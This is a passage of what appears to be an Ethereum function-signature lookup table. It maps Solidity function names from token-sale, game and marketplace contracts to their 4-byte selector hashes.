"0x4d3465fd", "icoSale()": "0x3ccc5e2c", "MAX_AIRDROP_VOLUME()": "0x6d399eb7", "accumulatedFee()": "0xf8ce3164", "aidPoolWallet()": "0x913fbd04", "COMPLETION_STATUS()": "0x9f7ff381", "ICOFactoryVersion()": "0x6eba68f9", "vipPlacementNotDistributed()": "0x8be3df0a", "PER_USER_AMOUNT()": "0x48f213e0", "legendsToken()": "0xc851b643", "Token_1()": "0x3ad0486b", "total_devidend()": "0xfc47fcf5", "marketting()": "0x22bb06d8", "teamWallet_2()": "0x8ed399ca", "getMaxParticipants()": "0x6a02209c", "augmintToken()": "0x7b9b9c89", "hasInitMartial()": "0xcea99275", "sellingAccepted()": "0x1b94198d", "getTopNames()": "0xc707bae5", "platformWithdrawAccount()": "0x0ab5bed4", "receiverContractAddress()": "0x7096b6cb", "allocatedFounders()": "0xd3e73312", "unpayPooling()": "0x5294bb2b", "totalBoughtColor()": "0x01a340a5", "salesVolume()": "0x0aaba432", "withdrawalCoolingPeriod()": "0x1170a759", "thirdMaxAmount()": "0xa86ed5e4", "burnRemainToken()": "0x7a290fe5", "totalSaleSupply()": "0x78231978", "novaContractAddress()": "0xf1f3ae31", "frozenMinDeposit()": "0x8355c263", "dealerDay()": "0xb186eed8", "JULIAN_ALLOCATION()": "0x221067a1", "lowestAddressReserving()": "0xa3cf3ec0", "VESTING_ADVISOR_DURATION()": "0x471b37cf", "ETHcap()": "0xc5df27ef", "getContributionHashes()": "0x45a7b991", "currentLevel()": "0x9dc4b9c9", "tokenPriceInCent()": "0x9f147c41", "poolCount()": "0xf525cb68", "PreICOCents()": "0xb48f4f5c", "crowdSaleAddr()": "0x8eeb33ff", "devSFTDestination()": "0x2693eca0", "CXLTotalSupply()": "0xb4d3c122", "ETHER_MAX_CONTRIB_PRIVATE()": "0x16cff09c", "whitelistLength()": "0x78bb5164", "totalContributors()": "0xf251fc8c", "totalEthRecieved()": "0x6e4ca716", "min4payout()": "0xcee80356", "requireAuthorisation()": "0x2d45c78d", "companyTokenWallet()": "0xf190a793", "coinMultiplayer()": "0x851cc7f9", "is_started_bonuses()": "0x80a507c6", "soldForFifth()": "0x981b69b7", "RESERVE_WALLET()": "0xd1e9822c", "salePhase()": "0xe4f2487a", "xclusivecoinSupply()": "0x30cdc195", "saosao6()": "0xa699d9b0", "_totalRemaining()": "0x6442af8d", "PRIVATE_STAGE_MAX_CAP()": "0x6a2ab790", "operationWallet()": "0xe042ad58", "saleIsClosed()": "0x017f27fc", "playerCost()": "0x718d763a", "month18companyUnlock()": "0xcebfa61e", "preSaleAddress()": "0xeb08aa3b", "getOwnedAvatars()": "0x721dd850", "commandGetBonus()": "0x87161e59", "count_customer_deposits()": "0x7d35f656", "moveUnsoldTokensToFoundation()": "0xd82974f8", "bitGuildContract()": "0xb0d997d9", "startTime_()": "0xc43aa319", "initial_tokens()": "0x11c28e1a", "endCrowdSaleTime()": "0x8a3aa194", "TOKEN_SHARE_OF_ADVISORS()": "0x6927e45a", "commRate()": "0xe3ae1667", "freezeDuration()": "0x440991bd", "legalsAddress()": "0x22e8571d", "DAILY_LIMIT()": "0x248ec326", "interval()": "0x947a36fb", "undropped()": "0xacac9a9f", "SALE_1WEEK_BONUS()": "0xe705a519", "INTREPID_PRICE_INCREMENT()": "0x4236da98", "TOKEN_UNIT_RATIO()": "0xf45984fd", "ICO_PHASE1_PERIOD()": "0xd42a9dd5", "ETH_QCO()": "0x28250d43", "jack_pot()": "0xf6946940", "isWithdrawable()": "0x4d840bcc", "distributedTokensAmount()": "0x0784a07f", "totalPresaleWei()": "0x8a9b35a7", "Token_4()": "0x751a2d06", "time_end_sale()": "0xc3682ace", "minDuration()": "0x56715761", "token_per_wei()": "0x6a25000c", "totalExcessEth()": "0xd7bea56a", "authorizeWithdrawal()": "0x43a8d9d5", "TakedFunds()": "0xa7f9801b", "accumulatedGasFees()": "0x180eebba", "heroLottery()": "0x0519b873", "Eth_Collected()": "0xea26b575", "STARTING_RICE()": "0x301cbcb3", "BOUNTY_EXCHANGE_SHARE()": "0x87369c4b", "CWCreturnQueryData()": "0x3c76aa19", "mintStart5()": "0x2525aa78", "objectShoes()": "0x0efe7f62", "offChainManager()": "0x4acd44db", "transactionFeeRate()": "0xa9689d0f", "COSIGN_MAX_TIME()": "0xc45df8e5", "cryptaurus()": "0x5a23932b", "shareToken()": "0x6c9fa59e", "VESTING_1_AMOUNT()": "0x6d076966", "totalRaisedIco()": "0x81df464f", "icoGoal()": "0xfd909594", "guarenteedPaybackTime()": "0x2b68fc21", "preEndBlock()": "0x812ba50c", "outRate()": "0x26cb2257", "distribute_for_founders()": "0x1ad8f65b", "seeCurrentParticipants()": "0xd10bc924", "MAX_REGULAR()": "0x300240d6", "sPeriodSoldTokensLimit()": "0x0a9fec36", "appId()": "0x80afdea8", "epsAddress()": "0x729680c3", "mgmtFeePercentage()": "0x35d37dbb", "dateEcoRelease12()": "0xb8bce6d0", "saleTokensHaveBeenMinted()": "0xb661f55d", "tokenIssuedPreFirstIco()": "0xedad8585", "etcWallet()": "0xe90d2120", "Electrium()": "0x77818808", "batman()": "0x66957377", "fundsRaised()": "0x6681b9fd", "ltcRaised()": "0x3ea6c986", "transferPrice()": "0x81cd8194", "wingsETHRewards()": "0x771e4326", "commission1()": "0x17ae1f6c", "onSaleAmount()": "0x9a70eb1a", "ATL_PER_ATP()": "0xd4be5f68", "stepOneEndTime()": "0x6e0550e5", "_price_token_PRE()": "0x06a81591", "teamTokensAddress()": "0x7b0de015", "ceilingStrategy()": "0xee51b879", "commit_end_time()": "0xb58fa125", "successor()": "0x6ff968c3", "GameNumber()": "0xa15a2289", "TOKEN_FOUNDERS()": "0x63302789", "getTop()": "0x5c2b1119", "allocated()": "0xb304b2e1", "preIcoAllocation()": "0xf11eb099", "DOWN_winBets()": "0xcf2e161c", "supervisor()": "0x56e4b68b", "GDCNumber3()": "0xb13795af", "lastMiningBlock()": "0x4f645993", "allow_refunds()": "0x223db315", "intervalLength()": "0xff0b3fc5", "preSaleFirstCap()": "0xc1098e2e", "referralBonusPercent()": "0xe9715de9", "numFpBits()": "0x71f805bf", "isPresaleFinalized()": "0xf34e2699", "crowdsaleOpen()": "0xb2d8efe0", "soldTokenInPublicsale()": "0xf8dc11cc", "satRaised()": "0xb785473c", "mainnetLocked()": "0x4b398a5c", "conversionOfferedAt()": "0xa5537586", "redemptionAddress()": "0x4dde3fe1", "PRICE_CROWDSALE()": "0x8b91d5f6", "PRESALE_MIN_INVEST()": "0x0b910f86", "DevAddress()": "0x89a4c1a0", "lockAssetHolder()": "0x3a6a2a69", "numMinters()": "0xe6f6266a", "btcToken()": "0x074bc101", "pre_ico_start()": "0x3dec4cb3", "bountySupplied()": "0x06096931", "depositGasCost()": "0xdf203ff7", "phase_3_bonus()": "0xbbad490f", "preICOBonusPercent()": "0xb2e4c183", "milliTokensSent()": "0x9a5a6483", "sellableToken()": "0x67aba225", "Bounty_Supply()": "0x77f3e3d1", "heartBeat()": "0xb56a9f2c", "TOKENS_FOR_SALE()": "0xc8612b2f", "ICO_RATE4()": "0x63b452fb", "totalBountyCount()": "0xf672c1aa", "tokenDeliveryDue()": "0x76e702ee", "addressD()": "0xd8574e16", "finalBlockNumber()": "0x7007adc9", "BNB_HARD_CAP()": "0x0012d90a", "claimNxc()": "0x165b22c1", "HARD_CAP()": "0x3a03171c", "cumAcceptedDeposits()": "0x2fdbb3d4", "detach()": "0x225435c0", "GetAccountIsFrozenByDateCount()": "0x1299c8fe", "year4Unlock()": "0x0b851937", "allocate3ProjectToken()": "0xeaf4b6df", "isFundLocked()": "0x7895f853", "dollarPerEtherRatio()": "0x3ca22916", "frozenForever()": "0x612acecc", "onemonth()": "0x688225d6", "minValue1()": "0x5b9632ca", "changeTokenFreezeDate(uint256)": "0x15502d73", "Vertex_Token(uint256,address,uint256)": "0x4927f408", "onlyWhitelistedCanDo()": "0x2a69e1c6", "WhitelistAddressisListed(address)": "0x0a01bc2f", "WhitelistAddressdisable(address)": "0xafc88141", "WhitelistAddressenable(address)": "0x9734855d", "WhitelistedAddress()": "0xc3440022", "changeFreezeDate(uint256)": "0x064cd77f", "TokenFreeze()": "0x8cadaa5d", "getInvestorDividend(address)": "0x8a93dbdf", "luckyBonus(uint256)": "0x77f37cd1", "welcomeBonus()": "0xf5112f87", "Cryptolotto6Hours(address,address,address,address)": "0x8a194223", "CoroToken()": "0x39d31e14", "payWithPLAT(uint256)": "0xb0dcbce5", "CryptoSagaSwapPLAT(address,address,address,address)": "0xb8a684f8", "SilverMoon()": "0xe5eb9d7a", "PeaceChainToken(uint256,string,string)": "0xfbabc444", "ETD()": "0xf124eab5", "MengToken()": "0x097cf31c", "Put_DEDI_gift(address)": "0xae4ab7ce", "NGToken()": "0xb993c871", "migrateBasicData(uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0xd5ff38ae", "addData(bytes32,bytes32,bytes32,bytes32[],uint256[],uint256[],uint256[],uint256[])": "0x6e900256", "getStopTransfer(address)": "0xa41a9445", "setStopTransfer(address,bool)": "0x184188f2", "BTCCToken()": "0x59fd95ae", "mint(bytes32,string,string,string,string,string)": "0x9263e371", "_transfer(bytes32,bytes32,uint256)": "0x7e2c0459", "_approvedFor(bytes32,uint256)": "0x888a3f79", "_owns(bytes32,uint256)": "0xd185f378", "createToken(bytes32,string,string,string,string,string)": "0x9bd41f7c", "getToken(bytes32,uint256)": "0x1e179ae0", "tokensOfOwner(bytes32)": "0x21d376ce", "transferFrom(bytes32,bytes32,uint256)": "0x2fb840f5", "approve(bytes32,bytes32,uint256)": "0xe0081b8c", "easyCommit(uint256,uint256,uint256)": "0x6b727312", "profit(uint256)": "0x1241ee7d", "changeTokenName(string,string)": "0x453920cb", "Helios()": "0x8d7fe693", "ToGoConcert(uint256,string,string)": "0xa82375d1", "ElyxrShrimpFarmer(address)": "0x976b59b5", "TAXChain()": "0x5c0cc07a", "WeiLaiExToken()": "0x8c2b8283", "MENSA(address)": "0x9549fea9", "SANKEYSOLUTION()": "0xb807ed76", "MDD()": "0x082c250c", "optionPoolMembersLockTotalOf(address)": "0xc7e210c3", "deliver(address,address,uint256)": "0x9bbedbbc", "YANKEES(address)": "0xb0eeefea", "FaFengToken()": "0x16fc1a0b", "SZ(uint256,string,string,uint8)": "0x1642fcca", "BEEFJERKY(address)": "0x90d783bb", "BitmassExchangeToken()": "0xed857bfd", "Wicflight()": "0x335a6b7d", "BCASToken(uint256,string,string)": "0x275a329a", "WolframExchangeTimes()": "0x45787fed", "BlackPearlETH()": "0x5d2694da", "batchVipWithLock(address[],uint256[],bool)": "0xe11df80d", "KUNAsToken()": "0x5c2d0e53", "FuckERsToken33()": "0xea348da6", "ETHHToken(uint256,string,string)": "0xbc3a72a5", "GIC()": "0x12f95b16", "unfreezeAccount(address,uint256)": "0x8fd7aab6", "TokenCLC(uint256,string,uint8,string)": "0xe2f0a05a", "setIco(address,address)": "0x48d8bb3f", "MECoin(uint256)": "0x4b4b6338", "setPrevOracle(address)": "0xaac3e314", "invalidateCache(bytes32)": "0x7575db0a", "balanceOf(address[],address)": "0x37fd25c7", "altTokenOf(address,address)": "0x657128a2", "SkyExchange()": "0xf02a4463", "KCCTOKEN()": "0x99a6993b", "MetadiumVesting(address,uint256,uint256,uint256,bool)": "0xd0de7b29", "EACCoin()": "0xbbf9cd8b", "DaWeiToken(uint256,string,string)": "0xef5fad95", "RANDCRYPT(uint256,string,string)": "0x95f20e88", "RuiXueToken()": "0x91d55c41", "addMassAddressToWhitelist(address[])": "0xaea43a29", "NABC()": "0x4316fae5", "SGem()": "0x1e0c60e2", "tokenOf(address,address)": "0xd5050493", "contractuallyOf(address,address)": "0xacaf0278", "Acandy(uint256,string,uint8,string)": "0x28f7f13b", "P4WDToken()": "0x4bad0881", "UCToken(uint256,string,string)": "0x7d7a1a80", "WhiteBullsToken()": "0xd55ac94c", "XBTexToken()": "0x43cd9655", "setBurnAddress(address)": "0x4b0e7216", "ICOBlaster()": "0xf1272f35", "setLSEscrowContractAddress(address)": "0xaa54abb1", "bidTransfer(uint256,address,uint256)": "0x1430990a", "updateDelayTime(uint256)": "0xd3f1a78c", "escrowTransfer(address,address,uint256,uint256)": "0x95955d22", "updateAllowedAddressesList(address,bool)": "0x38a6e813", "onICO(address,uint256)": "0x3994789d", "preICOMany(address[],uint256[])": "0x91ba5d6a", "preICO(address,uint256)": "0x41c173e2", "startICO(bool)": "0xbd0e6a0f", "greylistMany(address[])": "0xa2594b83", "addint16(int16,int16)": "0xa8c6e684", "equalStrings(string,string)": "0x791f0333", "_isCorrectBuyin(uint256)": "0xf84f30c4", "pullRipCord()": "0x9b1dd3e5", "logResult(int8,string)": "0x11c5a234", "addNewGame(string,int8)": "0xf8779524", "playerGuess(int8)": "0x68af1378", "correctResult(int8)": "0x5b9248aa", "playerIsRegistered(address)": "0xd5cfee3e", "playerLastScoredGame(address)": "0xea8b4627", "updateAllScores()": "0x55258a11", "updateScore(address)": "0xe3e7903f", "countParticipants()": "0x5c52bba7", "calculateScore(address)": "0x23e957b6", "gameResultsLogged()": "0x371e8e27", "showPlayerScores(address)": "0xb3f9b6e1", "makePrediction(int8,string)": "0xe0fe01f4", "NoblesseOblige()": "0x854bb344", "MOMCoin()": "0xec67abe4", "setReceivers(address,address,address)": "0x5d1c985b", "init(uint256,uint256,uint256,uint256)": "0x7662850d", "emitEnd()": "0x732b6963", "emitBegin()": "0xe84f82f0", "live()": "0x957aa58c", "Receiver()": "0x7312c065", "SendEthOff()": "0x4001e364", "SendEthOn()": "0xe6206711", "Disable()": "0x25a31135", "Enable()": "0x99c8055d", "LEToken()": "0x8c882958", "TotalSupply()": "0xa44b47f7", "admin_member_isWithdraw(address,bool)": "0xefedf429", "admin_isWithdrawable(bool)": "0x634e66ac", "admin_isPayable(bool)": "0x2c6b77e1", "admin_isRequireData(bool)": "0x358a074c", "admin_MinimalPayValue(uint256,uint256)": "0x2d6842b5", "admin_exFeeRate(uint256)": "0x10888f2f", "admin_withdraw(uint256,uint256)": "0x2868eda3", "admin_typeOf(address)": "0xa9f7d03b", "admin_list()": "0x5b0e8b82", "ask(address,uint256,uint256,uint256)": "0x0278bde1", "bid(address,uint256,uint256,uint256)": "0x8f70585f", "cancel(address,uint32)": "0xa7154d22", "members_push(address,address)": "0x10cb954c", "token_member_order_pop(address,address,uint32)": "0x7f9144ce", "tokens_push(address)": "0x2d09839f", "list_token_bid(address)": "0x7927bc0c", "list_token_ask(address)": "0x52e68c46", "BidAskX()": "0xa0ab308c", "transferFromTx(address,address,address,uint256)": "0x5b754491", "allow_spend(address)": "0x33e5bce1", "_allocation(address,address,address,address,address)": "0x30073514", "Cryptonationz(string,string,uint8,address,address,address,address,address)": "0xcc833e69", "EzPoint()": "0x86b14583", "DEP()": "0x6313bd30", "requestFreeDistribution()": "0x146ee571", "requestBounty()": "0x230bd25d", "releaseLockedToken()": "0xae1be1e4", "requestBonus()": "0xca3654e7", "addBounty(address,uint256)": "0x899a1e36", "setReferral(address,address,uint256)": "0x3baf6e3f", "releaseBountyTokens()": "0xab4459bc", "setCampaign(uint256,uint256)": "0xc627d0f8", "_getEarlyBonus()": "0xa69cbb50", "updateNameAndSymbol(string,string)": "0xeaf9d194", "myReferrals()": "0xb99b2f81", "randomContestant(uint256,uint256)": "0xc9634f32", "refundPlayer(address)": "0x446fcf22", "GooLaunchPromotion()": "0xccac77f5", "MassERC20Sender()": "0x80e0c053", "ARCADIA()": "0xfc8cddf2", "serviceAtIndex(uint256)": "0x9fc8ed76", "serviceCount()": "0x06237526", "updateServiceFee(bytes32,uint256)": "0x2576a779", "removeService(bytes32)": "0xd3884c3f", "addService(bytes32,uint256)": "0x99d80ed9", "isService(bytes32)": "0xfd277399", "NokuConsumptionPlan(address,address)": "0x28fff8d6", "NokuTokenBurner(address)": "0x3e9196b4", "SBITokenCrowdsale(address,address)": "0x8f67bd4d", "toggleTransfers(bool)": "0x68504158", "SBIToken()": "0x2762484a", "NggaToken()": "0x9e509af3", "PLUS()": "0x9d7bf73c", "ySignToken()": "0x3247dd8b", "countAssets()": "0xc5a83c2b", "addAssetToNetwork(address)": "0x8020f54e", "createAsset(bytes,uint256,bytes,bytes,address)": "0x20020a3a", "RareAsset(bytes,uint256,bytes,bytes,address)": "0x08988822", "withdrawExcessToken(address)": "0xce6b3467", "getQuantity(address)": "0x2e69e69b", "tokenQuantities()": "0x2075eec6", "redeem(uint256,address[])": "0x0959bd1a", "BsktToken(address[],uint256[],uint256,string,string)": "0x407ca6f8", "index(address[],address)": "0x1a09510a", "cap()": "0x355274ea", "MineableToken()": "0x6ee63f1f", "transferAndFreezeMulti(address[],uint256[],uint256[],uint256[])": "0x8c0124fb", "freezeMulti(address[],uint256[],uint256[],uint256[])": "0x5f3d634f", "releaseMultiWithStage(address[])": "0x3b16f5f6", "token_transferFrom(address,address,address,uint256)": "0xe04c130b", "token_transfer(address,address,uint256,bytes,string)": "0x7e1629ab", "token_transfer(address,address,uint256,bytes)": "0xc2723d2e", "token_transfer(address,address,uint256)": "0x60acf888", "token_allowance(address,address)": "0x6b4a8b78", "token_balanceOf(address)": "0x728addbc", "token_totalSupply()": "0x4d2d0a3d", "dummy()": "0x32e43a11", "publishMetaData(bytes32)": "0x81e69eff", "AlbaritTokenV4(address,string,string,uint256,uint256)": "0x2a226857", "bakkaToken()": "0x1c844171", "utrTestToken()": "0xdef4ba32", "credit_token(address[],uint256)": "0x35100acc", "buy_token(address[])": "0x230f49d9", "calculateValue(int256,uint64)": "0xc5efaa11", "calculateVariation(uint64,uint64,int64)": "0x1e72a7fc", "advance(bytes15,uint32,uint64,uint64,int64,uint64)": "0x89e94513", "ZooToken(uint256)": "0xf3a247cb", "getLockAccInfo(address)": "0xc533fc68", "setLockAccInfo(address,string)": "0x54e031cb", "getLockAccount(address,uint256)": "0xc51cd6ad", "transferByLock(address,uint256,uint256,uint256)": "0xf06067ac", "TRTToken()": "0xcbb2fd5d", "CtfToken()": "0xccfe4691", "QiiToken()": "0x0611037c", "verifyCertificate(address,uint256)": "0xd9af3691", "applyForCertification(string,string,address,string,string,uint256)": "0xc3c74c45", "addCourse(string,string,string,string,string)": "0xdea4267b", "bennylamToken()": "0x972ab95a", "confirm(uint256,uint256)": "0x8651dc1e", "getBalancesAgent(uint256)": "0x6aec47b4", "getBalancesSeller(uint256)": "0xcf200e9f", "getBalancesPayer(uint256)": "0x156a0528", "createNew(address)": "0x63be8fc8", "acceptOrder(uint256)": "0xef18e9ed", "getOrdersLength()": "0x07c2e16c", "applyRaises(uint256[])": "0xc88bf75a", "createLandAndAuction(address,uint256,address,uint256,uint256)": "0xf4c2ebdd", "createLand(address,uint256)": "0xdb165a76", "removeLand(address,uint256)": "0x12b1f8a9", "addLand(address,uint256)": "0x9cef2a6a", "createAuctionFromArray(address,uint256[],uint256,uint256)": "0x5aff457f", "createAuction(address,uint256,uint256,uint256)": "0x61beb1d7", "landsOf(address)": "0x9805d7d2", "receiveCreateAuctionFromArray(address,address,uint256[],uint256,uint256)": "0xc89e528e", "receiveCreateAuction(address,address,uint256,uint256,uint256)": "0x100a0ed1", "receiveApproval(address,address,uint256,bytes)": "0x56826ee6", "WinbitTest()": "0xf2f6861b", "purchaseTokensInICO(uint256,address)": "0x12fb5b67", "getPairHash(address,address)": "0xd7b7961c", "play(address,bytes32)": "0x9987680b", "acceptChallenge(address)": "0x4db347a3", "challenge(address)": "0x72fb9703", "GetWinner(bytes32,address,bytes32,address)": "0xe1abf819", "evaluate(address,string,string)": "0x0c0615a7", "MikCoinToken()": "0x2074cc86", "_burnFrom(address,uint256)": "0xa22b35ce", "associate(bytes32,bytes32[],address[])": "0x6bf6dd6f", "getLastPaidTransaction()": "0xe912ae4f", "getTransactionInformation(uint256)": "0x9fb69839", "getParticipantTransactions(address,address)": "0xd5cb4a04", "getMyOwed(address,address)": "0xb5116a93", "getPeopleBeforeMe(address,address)": "0xfc05a6fc", "setTesting(bool)": "0x08ed8d16", "isTesting()": "0xcc724b27", "forcePayout()": "0x5b23bf8a", "_payFees()": "0x85ff70de", "_checkTransactions(address)": "0xd5668a92", "KBKToken()": "0x08ebd3d3", "openSale(uint256,uint256,uint256,uint256)": "0x63b87bb8", "isSaleOpen()": "0x1a081330", "MentalhealthToken()": "0x6f8177f4", "packStore(address)": "0x92c19394", "move(address,address,uint8,uint256)": "0x213db226", "pack(bytes,address,address,uint8,uint256)": "0xae02ee5b", "store(bytes,address)": "0x3cba41bf", "newOwner(address,address)": "0xf2c0d168", "enable(address,bool)": "0xec973642", "owner(address)": "0x666e1b39", "newMaster(address)": "0x462dcfa0", "canMove(address)": "0xe9087eb7", "approveMove(address,bool)": "0x5af0f053", "add(address,uint8,uint256)": "0xefa3d586", "coupon(address,uint256)": "0x97c25f95", "buy(uint256,address,uint256,uint256)": "0x706910ff", "canUse(uint256)": "0xf5fc20c6", "copyright(address)": "0xd90d5b58", "editPrice(uint256,uint256)": "0xd0e7a5cb", "editInfo(uint256,bytes)": "0x81a955b0", "item(uint256,bool,bytes)": "0xabf26786", "aboutItem(uint256)": "0x3838a099", "income()": "0x88b45046", "voteDn(uint256)": "0x21e3cdd0", "voteUp(uint256)": "0xd4ebc5ff", "canVote(uint256)": "0x25746251", "about()": "0x5e1d5482", "updateTopicAssetClass(bytes15,string)": "0x4b6b2300", "updateTopicDescription(bytes15,string)": "0x1a1a0d76", "insertTopic(bytes15,address,string,string)": "0x40f354f3", "withdrawAll(address[])": "0x6568a279", "calculateMintAmount()": "0x120e8f05", "Minter(uint256,address)": "0x0ac924a0", "incrementTotalSupply(uint256)": "0xd5dbe634", "mintToAccount(address,uint256)": "0x356e7e9d", "ProsperaToken(uint256,string,uint8,string)": "0xb962de9a", "Xoflife()": "0xc285daf9", "SummerGreen()": "0xc64bf22d", "transferTimelocked(address,uint256,uint256)": "0xc48a66e0", "AAAToken()": "0xb94844dd", "getCanvasPainters(uint32)": "0x13730838", "getCanvasesWithSellOffer(bool)": "0xc9f8cf20", "getCanvasByOwner(address)": "0x9f572048", "getCanvasInfo(uint32)": "0xd90cdfb4", "cancelSellOfferInternal(uint32,bool)": "0x907f7aa8", "_offerCanvasForSaleInternal(uint32,uint256,address)": "0x4fdc4295", "getCurrentSellOffer(uint32)": "0x49b6313c", "getCurrentBuyOffer(uint32)": "0x754d71e7", "acceptBuyOffer(uint32,uint256)": "0xaaf47835", "cancelBuyOffer(uint32)": "0xa4ab69cd", "makeBuyOffer(uint32)": "0xbd9e6bfc", "cancelSellOffer(uint32)": "0xca5397c7", "offerCanvasForSaleToAddress(uint32,uint256,address)": "0xce4a6f09", "offerCanvasForSale(uint32,uint256)": "0x286b583b", "acceptSellOffer(uint32)": "0x7e6e65f3", "_calculateCommission(uint256)": "0x8807592c", "_calculatePricePerPixel(uint256)": "0xe03335b4", "setMinimumBidAmount(uint256)": "0x5130b405", "addCommissionToPendingWithdrawals(uint32)": "0xd6721000", "calculateCommission(uint32)": "0x7366c68d", "addRewardToPendingWithdrawals(uint32)": "0xa2b6f0ec", "calculateReward(uint32,address,address)": "0x457e8fc7", "getCanvasByState(uint8)": "0x7fbea955", "getCanvasState(uint32)": "0x477a7042", "getLastBidForCanvas(uint32)": "0xae7ed04c", "makeBid(uint32)": "0xa350539e", "_getCanvas(uint32)": "0x4fa0a4b7", "getPaintedPixelsCountByAddress(address,address,uint32)": "0x0891f387", "getPixelAuthor(uint32,uint32)": "0xfbebc9af", "isCanvasFinished(uint32)": "0x4bdfbb75", "getCanvasCount()": "0x2c54e6d9", "getPixelCount()": "0x7be8352e", "getCanvasPaintedPixelsCount(uint32)": "0xd9bc9873", "getCanvasBitmap(uint32)": "0xabb43397", "setPixel(uint32,uint32,uint8)": "0xaacdb27b", "createCanvas()": "0xe9ceef50", "addPendingWithdrawal(address,address,uint256)": "0x89cfa823", "getPendingWithdrawal(address,address)": "0x5699c7b1", "FangTangCoin(uint256,string,string,uint8,bool,uint256,uint256,uint256,uint256)": "0xb8918710", "getETH()": "0x14f6c3be", "probe(address)": "0x275e5da5", "GSENetwork()": "0x7dce8461", "grantOf(address)": "0x95d6718a", "grant(address,uint256)": "0x6370920e", "preGrant(address,uint256)": "0x7c6bd3e8", "changeTokenPrice(uint256,uint256,uint256)": "0x47eb86f1", "changePhaseToPreICO2()": "0x6ba4fadb", "Mondo()": "0x0eb14edb", "addPack(address[],uint24[],uint24[],uint16)": "0x472c681f", "SantimentWhiteList()": "0x30fa9ef3", "cancelOffer(uint16)": "0x4807270b", "acceptOffer(uint16,uint256)": "0xbfe6b1ac", "createOffer(uint16,uint256)": "0xe33a9ab7", "setMarketplaceFee(uint256)": "0x9407ea98", "setAllowMarketplace(bool)": "0x8b2d2dca", "transferTokens(address,address)": "0x6a092e79", "subGlobalBlockValueBalance(uint256)": "0x9f08fc38", "addGlobalBlockValueBalance(uint256)": "0x542bee82", "subUserBattleValue(address,uint256,bool)": "0x1466724a", "addUserBattleValue(address,uint256)": "0x330ae7b3", "withdrawBattleValue(address,uint256)": "0x11bb20da", "getLocalGame(uint16)": "0x1ba3afd3", "setLocalGame(uint16,address)": "0x3c580e92", "moveBlockValue(address,uint8,uint8,uint8,uint8,uint256)": "0xfe562ee6", "updateFeeBalance(uint256)": "0xb0a1bfa9", "attackTile(address,uint16,uint256,bool)": "0x72852fe5", "fortifyClaim(address,uint16,uint256)": "0x1e8fba36", "fortifyClaims(address,uint16[],uint256,bool)": "0xc27bc7b2", "storeInitialClaim(address,uint16[],uint256,bool)": "0xd4212e93", "setDefendBoostCap(uint256)": "0x8fe3ec6d", "setAttackBoostCap(uint256)": "0x4653a1fa", "setDefendBoostMultiplier(uint256)": "0x78d9472f", "setAttackBoostMultipler(uint256)": "0xab7af62f", "setAttackFee(uint256)": "0x956d2172", "setWithdrawFee(uint256)": "0xb6ac642a", "setValidBwMarketCaller(address)": "0xacd2988c", "setValidBwCaller(address)": "0x0b21d446", "deleteOffer(uint16)": "0xbff10815", "setSellPrice(uint16,uint256)": "0x220fde2e", "deleteTile(uint16)": "0xf4010db0", "censorUser(address,bool)": "0xc26181e0", "calculateBattleBoost(uint16,address,address)": "0xc7ceac99", "verifyAmount(address,uint256,uint256,bool)": "0x32214874", "setUserBattleValue(address,uint256)": "0x8fa54b81", "getUserBattleValue(address)": "0x7d9c68f7", "setFeeBalance(uint256)": "0x8580eb2f", "getFeeBalance()": "0xd4c30ceb", "setBlockValueBalance(uint256)": "0x77f122bd", "getBlockValueBalance()": "0xb187b6b1", "getCurrentBlockValueAndSellPriceForTile(uint16)": "0xabd958eb", "getCurrentClaimerForTile(uint16)": "0xaae40ddc", "_sellPutToClose(uint256,uint256,uint256,uint256,address)": "0xddc3e344", "_sellPutToOpen(uint256,uint256,uint256,uint256,address)": "0x876339b8", "_buyPutToClose(uint256,uint256,uint256,uint256,address)": "0x928b685c", "_buyPutToOpen(uint256,uint256,uint256,uint256,address)": "0x558e223f", "_sellCallToClose(uint256,uint256,uint256,uint256,address)": "0x6846fe64", "_sellCallToOpen(uint256,uint256,uint256,uint256,address)": "0x8d259d65", "_buyCallToClose(uint256,uint256,uint256,uint256,address)": "0xe1a9f9b9", "_buyCallToOpen(uint256,uint256,uint256,uint256,address)": "0xbfafe92f", "distributeAllTokensToContributor()": "0xd1e19ab2", "distributeTokensToContributor(uint256,uint256)": "0x530abf0f", "distributeTokensToContributorByIndex(uint256)": "0x605f2ca4", "getNumberOfContributors()": "0x8bba143c", "transferTokensToContributor(uint256)": "0xc9cc1a05", "preSaleFinishedProcess(uint256)": "0x3a72cd49", "addContributorManually(address,uint256,uint256)": "0x49de0485", "setDistributionTime(uint256)": "0xd7b97db1", "setSale(uint256,uint256)": "0xf901a18f", "setlargeBonusStopTime(uint256)": "0xf631345b", "setPresaleDates(uint256,uint256)": "0xdc12abb5", "TRLCoinSale(address)": "0x93847d54", "getTokenAwarded()": "0x042d65ab", "getTokenRemaining()": "0xd1786610", "getLargeBonusStopTime()": "0x99456542", "getLargeBonus()": "0x97cda349", "getSmallBonus()": "0x34065b66", "getDistributionTime()": "0x7456f2b9", "getSale()": "0x0bae3288", "getPresale()": "0xaee99e52", "getHasStartedState()": "0x296f1ce1", "addContribution(address,uint256,uint256)": "0x70a89986", "EthernetCash()": "0xbf7f8b89", "NuoYiLian(uint256,string,uint8,string)": "0x18ae21e8", "purchaseWithDai(uint256,uint256,uint256,uint256,address,bytes)": "0xf9676db4", "purchaseWithEth(uint256,uint256,uint256,address,bytes)": "0xd9c263f8", "marketplace_controller_v2()": "0xd9b4abf5", "MarketplaceV2(address)": "0xe7073a4c", "purchase_with_dai(uint256,address,uint256,uint256,uint256,address,bytes)": "0x5cc3c951", "purchase_with_eth(uint256,address,uint256,uint256,uint256,address,bytes)": "0xcd2a0c29", "DenmarkvsFrance()": "0x5ff79c07", "nuoyilian(uint256,string,uint8,string)": "0x53e0c46d", "SetFreeMKI(uint256)": "0xea57712a", "SetupiBird(string,string,uint256,uint256,uint256,address,address,uint256)": "0x34c8ea26", "Makindo()": "0xcfc45610", "AnimalFoodToken()": "0xcb03e43b", "CoinhiToken()": "0x10328e89", "AustraliavsPeru()": "0x56b6dbe9", "dev_fee(uint256)": "0xabc66e82", "ResidualValue(uint256,string,string)": "0x55f0d02c", "xCrypt(address,address,address,address)": "0xb74e20bb", "TOXToken()": "0x452fa483", "MyEtherTeller()": "0x0268ec43", "LETX()": "0xaa5c02a3", "TronClone()": "0xac84ed4f", "STELLARGOLD()": "0x5dfde910", "ShareErc20(string,string,uint256)": "0xb571324d", "Share(uint256)": "0xffef8f88", "MixinToken()": "0x68177733", "Elephant()": "0x964f6dcd", 